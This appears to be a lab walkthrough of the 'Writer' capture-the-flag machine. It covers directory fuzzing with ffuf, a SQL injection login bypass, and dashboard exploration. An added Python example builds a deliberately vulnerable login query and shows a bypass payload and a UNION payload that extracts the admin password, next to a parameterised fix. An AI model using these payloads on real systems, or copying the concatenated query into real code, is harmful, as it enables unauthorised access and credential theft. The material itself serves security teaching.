Web


Nmap discovered a web server on the target's port 80. The running service is Apache httpd 2.4.41.

Webroot

It appears to be a journaling blog. There are 8 articles published by a number of authors, who could be potential users.

The footer shows the domain information

It’s been appended to the /etc/hosts file on Kali for local DNS resolution

The ABOUT button in the header points to /about, which briefly describes the website and confirms that the admin user exists.

There is an input form at /contact, but it doesn't appear to be functional.

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs/writer]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://writer.htb/FUZZ -ic -e .php,.txt,.html
________________________________________________
 :: Method           : GET
 :: URL              : http://writer.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
about                   [Status: 200, Size: 3522, Words: 250, Lines: 75, Duration: 340ms]
contact                 [Status: 200, Size: 4905, Words: 242, Lines: 110, Duration: 330ms]
static                  [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 198ms]
logout                  [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 96ms]
dashboard               [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 218ms]
administrative          [Status: 200, Size: 1443, Words: 185, Lines: 35, Duration: 185ms]
server-status           [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 91ms]

Fuzzing the web server reveals an interesting directory

/administrative


It’s a login page

Wappalyzer identified that the web application is written in PHP

Both default and weak credentials failed

Attempting to bypass the authentication with SQLi

It worked: the response redirects me to the dashboard page.

/dashboard


/dashboard shows some information regarding the status of the website

The menu button opens up and reveals more buttons leading to configuration pages.

/dashboard/users

It appears that the admin user is the only administrative user. A search bar is present, but it filters the table client-side without sending any web requests, so it offers no SQLi surface.

/dashboard/stories

/dashboard/stories lets me view and manage all the publications. Since adding a story involves a file upload, I tested it for code execution, but that failed: arbitrary file upload is not possible through here.

/dashboard/settings

/dashboard/settings shows several options, yet none of these are functional

Vulnerability


At this point, the web application appeared not to be vulnerable, as I had gone through pretty much every feature that /dashboard contains.

However, I had missed something big earlier.

Authentication bypass through SQLi was confirmed to be present earlier. That's how I was able to access the resources under /dashboard.

And the web server's initial response to that login was a redirection page that shows Welcome Admin. That Admin might not be static text, but rather a value fetched by the backend SQL query and displayed, which would mean the output of the injected query is reflected back to the user.
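The bypass at /administrative and the reflected Welcome Admin banner come down to the same mechanism: the login query is assembled from user input, and whatever row it returns is rendered. The following is an added example and is not code from the original write-up or from the target application. It models an assumed login routine against an in-memory SQLite table; the table name, columns, credentials and query shape are all assumptions, and the final password-extraction payload goes beyond what the write-up tests, to show what it means if the displayed name really is query output.

```python
import sqlite3

# Constructed stand-in for the blog's user table. The real application's
# schema, DBMS and query are unknown; everything here is an assumption.
SAMPLE_USERS = [
    ("admin", "S3cretAdminPass!"),
    ("editor", "Wr1terEditor"),
]


def make_db():
    """Build an in-memory SQLite database with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Login that builds the statement by string concatenation.

    Returns the username column of the first matching row, which is exactly
    what a 'Welcome <name>' banner would display, or None on failure.
    Because the input becomes part of the SQL text, it can both change the
    WHERE clause (bypass) and change what the SELECT returns (reflection).
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same lookup with a parameterised query: input is bound as data only."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Classic bypass: the comment discards the password check, 1=1 matches all
# rows, and the first row (admin) is returned and greeted as "Welcome admin".
BYPASS_PAYLOAD = "' OR 1=1-- -"

# If the banner reflects query output, the attacker controls the SELECT too:
# this UNION makes the "username" the banner prints be another column.
REFLECT_PAYLOAD = "' UNION SELECT password FROM users WHERE username='admin'-- -"


def demo():
    """Run the three cases and return the results for inspection."""
    conn = make_db()
    return {
        "legit": vulnerable_login(conn, "admin", "S3cretAdminPass!"),
        "bypass": vulnerable_login(conn, BYPASS_PAYLOAD, "anything"),
        "reflected": vulnerable_login(conn, REFLECT_PAYLOAD, "anything"),
        "safe_bypass": safe_login(conn, BYPASS_PAYLOAD, "anything"),
        "safe_legit": safe_login(conn, "admin", "S3cretAdminPass!"),
    }


if __name__ == "__main__":
    for case, banner in demo().items():
        print(f"{case:12s} -> Welcome {banner}")
```

The point the example makes is that a successful bypass is evidence the query text is attacker-controlled, and a banner that echoes a value from that query is evidence the result set is attacker-readable; the fix is the parameterised form, where the same payloads simply return no row.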